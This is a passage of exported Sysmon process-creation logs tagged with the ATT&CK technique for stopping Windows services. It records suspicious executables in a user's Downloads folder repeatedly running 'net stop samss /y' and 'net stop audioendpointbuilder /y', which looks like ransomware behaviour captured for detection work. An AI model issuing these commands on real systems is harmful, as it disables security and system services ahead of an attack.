+CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:58.113564800Z"",""eventRecordID"":""1157"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:21:58.102\r\nProcessGuid: {df9fc3d3-d1f6-5ec7-0000-001000cb3900}\r\nProcessId: 182144\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:21:58.102"",""processGuid"":""{df9fc3d3-d1f6-5ec7-0000-001000cb3900}"",""processId"":""182144"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:39:34.622",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:21:26.551 +ProcessGuid: {df9fc3d3-d1d6-5ec7-0000-00101f383300} +ProcessId: 165548 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation 
+OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d1d6-5ec7-0000-0010cd1b3300} +ParentProcessId: 165472 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:26.553613400Z"",""eventRecordID"":""1153"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:21:26.551\r\nProcessGuid: {df9fc3d3-d1d6-5ec7-0000-00101f383300}\r\nProcessId: 165548\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d1d6-5ec7-0000-0010cd1b3300}\r\nParentProcessId: 165472\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:21:26.551"",""processGuid"":""{df9fc3d3-d1d6-5ec7-0000-00101f383300}"",""processId"":""165548"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d1d6-5ec7-0000-0010cd1b3300}"",""parentProcessId"":""165472"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:39:34.607",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:21:26.235 +ProcessGuid: {df9fc3d3-d1d6-5ec7-0000-00100a223300} +ProcessId: 165496 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop 
""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d1d5-5ec7-0000-001012033300} +ParentProcessId: 165036 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:26.242662700Z"",""eventRecordID"":""1152"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:21:26.235\r\nProcessGuid: {df9fc3d3-d1d6-5ec7-0000-00100a223300}\r\nProcessId: 165496\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d1d5-5ec7-0000-001012033300}\r\nParentProcessId: 165036\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:21:26.235"",""processGuid"":""{df9fc3d3-d1d6-5ec7-0000-00100a223300}"",""processId"":""165496"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d1d5-5ec7-0000-001012033300}"",""parentProcessId"":""165036"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:39:34.591",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:21:26.163 +ProcessGuid: {df9fc3d3-d1d6-5ec7-0000-0010cd1b3300} +ProcessId: 165472 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe 
+CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:26.169939500Z"",""eventRecordID"":""1151"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:21:26.163\r\nProcessGuid: {df9fc3d3-d1d6-5ec7-0000-0010cd1b3300}\r\nProcessId: 165472\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:21:26.163"",""processGuid"":""{df9fc3d3-d1d6-5ec7-0000-0010cd1b3300}"",""processId"":""165472"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:39:34.562",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:21:25.849 +ProcessGuid: {df9fc3d3-d1d5-5ec7-0000-001012033300} +ProcessId: 165036 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe 
+CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:25.851290900Z"",""eventRecordID"":""1149"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:21:25.849\r\nProcessGuid: {df9fc3d3-d1d5-5ec7-0000-001012033300}\r\nProcessId: 165036\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:21:25.849"",""processGuid"":""{df9fc3d3-d1d5-5ec7-0000-001012033300}"",""processId"":""165036"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:39:23.542",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:21:15.051 +ProcessGuid: {df9fc3d3-d1cb-5ec7-0000-0010c4723100} +ProcessId: 153708 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation 
+OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d1ca-5ec7-0000-0010f1683100} +ParentProcessId: 153288 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:15.075732000Z"",""eventRecordID"":""1148"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:21:15.051\r\nProcessGuid: {df9fc3d3-d1cb-5ec7-0000-0010c4723100}\r\nProcessId: 153708\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d1ca-5ec7-0000-0010f1683100}\r\nParentProcessId: 153288\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:21:15.051"",""processGuid"":""{df9fc3d3-d1cb-5ec7-0000-0010c4723100}"",""processId"":""153708"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d1ca-5ec7-0000-0010f1683100}"",""parentProcessId"":""153288"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:39:23.509",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:21:14.828 +ProcessGuid: {df9fc3d3-d1ca-5ec7-0000-0010f1683100} +ProcessId: 153288 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" 
stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900} +ParentProcessId: 5232 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" 8 LAN""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:14.853777300Z"",""eventRecordID"":""1147"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:21:14.828\r\nProcessGuid: {df9fc3d3-d1ca-5ec7-0000-0010f1683100}\r\nProcessId: 153288\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
